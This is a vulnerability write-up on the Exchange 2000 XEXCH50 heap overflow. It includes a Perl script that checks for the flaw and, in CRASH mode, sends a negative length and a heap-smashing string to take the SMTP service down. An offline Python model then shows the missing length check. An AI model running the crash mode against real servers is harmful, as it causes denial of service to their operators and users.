Document information:
On October 15th, Microsoft released an advisory stating that both Exchange 5.5 and Exchange 2000 were vulnerable to a denial of service attack in the code which processes extended verb requests. This advisory also stated that Exchange 2000 was vulnerable to a buffer overrun that would allow a remote attacker to execute the code in the context of the SMTP service.
Content extracted from document:
Exploiting the heap overflow in Microsoft Exchange 2000

A few notes on this bug:

On October 15th, Microsoft released an advisory stating that both Exchange 5.5 and Exchange 2000 were vulnerable to a denial of service attack in the code which processes extended verb requests. This advisory also stated that Exchange 2000 was vulnerable to a buffer overrun that would allow a remote attacker to execute the code in the context of the SMTP service.

The supported extended verb requests can be determined by sending the EHLO command to the SMTP service. After checking both the 5.5 and 2000 versions of the Exchange SMTP service, it was obvious that the problem had to be with the XEXCH50 verb. A quick google search and I was able to find a quick description of this verb:

From http://smtpfilter.sourceforge.net/esmtp.html:

    Allows transfer of binary data with Exchange specific recipient information (eg plain text only versus MIME, etc). If accepted, the receiving SMTP server sends "354 Send Binary data" and the sending SMTP server sends the number of bytes as the first parameter on the XEXCH50 command. Once these bytes are sent, the receiving SMTP server sends an acknowledgment.

After a few minutes of digging on google groups, I came across a sample TCP session showing how the XEXCH50 verb is used. This verb is used to transfer messages between Exchange servers using their native envelope format. The syntax of the verb is:

    XEXCH50 <X> <Y>

Where X is the length of the message and Y always seems to be the number 2 (although other small integer values work as well).

The denial of service can be triggered by sending an XEXCH50 request with a massive number of bytes for the first argument. This forces the remote server to allocate that specified amount of space and can easily be used to drain all available memory from a system. Once Exchange runs low on memory, it no longer processes incoming requests, leading to a quick and easy remote denial of service.

If a negative value is passed as the first argument of the XEXCH50 verb request, the server will not allocate any memory but still accept data. This can be used to clobber the heap and eventually execute arbitrary code... It ends up that the heap area that is overwritten is used by the GetServiceConfigInfoSize routine and many of the subroutines that it calls. After testing more than two hundred combinations of data size, data content, preallocation, multiple connections, and alternate trigger paths, I was unable to find a set that would allow for reliable exploitation. Using the Snapshot/Revert functions of VMWare allowed me to test different data combinations in the exact same running process. Just changing a few bytes deep into the data resulted in a change in the location and type of crash. Even using the exact same data will result in a smaller set of completely different crashes using different chunks of the data. So for the moment, I have no working exploit. More than likely someone will find the perfect set of parameters and be able to write a reliable exploit, but in the meantime I am going to burn my time on something more fulfilling.

You can find a small perl script that reproduces the crash and tests for the vulnerability at the URL below.

http://metasploit.com/releases.html

Exploit code:

#!/usr/bin/perl -w
###################
# ms03046.pl
# hdm[at]metasploit.com
##

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;

if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }
usage();

# CHECK: issue a harmless XEXCH50 and look at how the server answers it
sub check {
    my $s = SMTP($host, $port);
    if (! $s) {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res =~ /authentication/i) {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";
    exit(0);
}

# CRASH: pass a negative length, then send data the server never allocated room for
sub crash {
    my $s = SMTP($host, $port);
    if (! $s) {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res =~ /authentication/i) {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] Sending massive heap smashing string...\n";
    print $s ("META" x 16384);

    # sometimes a second connection is required to trigger the crash
    $s = SMTP($host, $port);
    exit(0);
}

sub usage {
    print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
    exit(0);
}

# open the session and walk it up to the point where XEXCH50 is accepted
sub SMTP {
    my ($host, $port) = @_;
    my $s = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp") || return(undef);
    my $r = <$s>; return undef if ! $r;

    # the banner of an Exchange SMTP service identifies itself as Microsoft
    if ($r !~ /Microsoft/) {
        chomp($r);
        print STDERR "[*] This does not look like an exchange server: $r\n";
        return(undef);
    }

    print $s "HELO X\r\n";
    $r = <$s>; return undef if ! $r;
    print $s "MAIL FROM: DoS\r\n";
    $r = <$s>; return undef if ! $r;
    print $s "RCPT TO: Administrator\r\n";
    $r = <$s>; return undef if ! $r;
    return($s);
}

...
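As an added example (not hdm's ms03046.pl and not Exchange's own code), the following Python models the exchange the text describes and the check a receiver should make on the X argument before trusting it: an EHLO capability list is parsed for XEXCH50, the verb is built as XEXCH50 <X> <Y>, and a constructed receiver answers 354 for any integer X when unpatched but demands authentication first when patched, which is the property the CHECK mode of the script above keys on. The host name, the capability list apart from XEXCH50, and the exact wording of the refusal replies are assumptions; the real script's HELO, MAIL FROM and RCPT TO preamble over TCP is left out so that this runs offline.

```python
"""Offline model of the XEXCH50 probe and of the length check a receiver needs.

Added example for this page; it is not hdm's ms03046.pl and not Exchange code.
Constructed reply strings stand in for a live Exchange 2000 SMTP service. The
wording of a patched server's refusal is an assumption: the only property the
original script relies on is that the reply contains the word "authentication".
"""
import re

# Constructed ESMTP capability list in the shape of an EHLO reply. Apart from
# XEXCH50 (taken from the page) the keywords and host name are illustrative.
EHLO_REPLY = (
    "250-exch.example.test Hello [10.0.0.5]\r\n"
    "250-SIZE 10485760\r\n"
    "250-AUTH NTLM\r\n"
    "250 XEXCH50\r\n"
)


def ehlo_extensions(reply: str) -> list:
    """Extension keywords from a multi-line 250 reply (the first line is the greeting)."""
    lines = [ln for ln in reply.splitlines() if re.match(r"^250[ -]", ln)]
    return [ln[4:].split()[0].upper() for ln in lines[1:]]


def xexch50_command(length: int, flag: int = 2) -> bytes:
    """The verb as described on the page: XEXCH50 <X> <Y>, X = byte count, Y = 2."""
    return f"XEXCH50 {length} {flag}\r\n".encode()


def parse_length(arg: str, max_len: int = 10 * 1024 * 1024):
    """What a receiver must do with X before allocating or reading anything.

    Refuses a sign (the negative-value path from the page), non-digits, zero and
    values above a cap (the allocation-exhaustion path). Returns None on refusal.
    """
    if not re.fullmatch(r"[0-9]{1,9}", arg):
        return None
    n = int(arg)
    if n == 0 or n > max_len:
        return None
    return n


def receiver_reply(cmd_line: str, patched: bool, authenticated: bool = False) -> str:
    """Constructed receiver. Unpatched: any integer X is accepted and 354 is
    announced, so -1 or a huge X go straight through. Patched: XEXCH50 is only
    honoured after authentication, and X is validated with parse_length()."""
    parts = cmd_line.split()
    if len(parts) != 3 or parts[0].upper() != "XEXCH50":
        return "501 Syntax error"                              # constructed wording
    if patched:
        if not authenticated:
            return "530 Authentication required for XEXCH50"   # constructed wording
        if parse_length(parts[1]) is None:
            return "501 Invalid length"                        # constructed wording
    else:
        try:
            int(parts[1])       # the unpatched path trusts a signed integer here
        except ValueError:
            return "501 Syntax error"
    return "354 Send binary data"


def classify_reply(reply: str) -> str:
    """Decision on the XEXCH50 reply. The original script only distinguishes the
    authentication refusal (patched) from everything else (vulnerable); this
    version additionally separates a 354 from any other refusal."""
    if re.search(r"authentication", reply, re.I):
        return "patched"
    if reply.startswith("354"):
        return "accepting-data"
    return "refused"


def probe(patched: bool, length: int = 2, authenticated: bool = False) -> str:
    """CHECK path of the original script, run against the constructed receiver."""
    if "XEXCH50" not in ehlo_extensions(EHLO_REPLY):
        return "refused"
    cmd = xexch50_command(length).decode()
    return classify_reply(receiver_reply(cmd, patched, authenticated))


if __name__ == "__main__":
    for patched in (False, True):
        for x in (2, -1, 4000000000):
            print(f"patched={patched!s:5} X={x:<11} -> {probe(patched, x)}")
```

Running the file prints one line per (patched, X) pair. The rows to look at are the unpatched X = -1 and X = 4000000000 cases, which are answered with 354 exactly like X = 2, while the hardened parse_length() refuses both: a sign or an out-of-range count must be rejected before any allocation or read happens, not discovered afterwards.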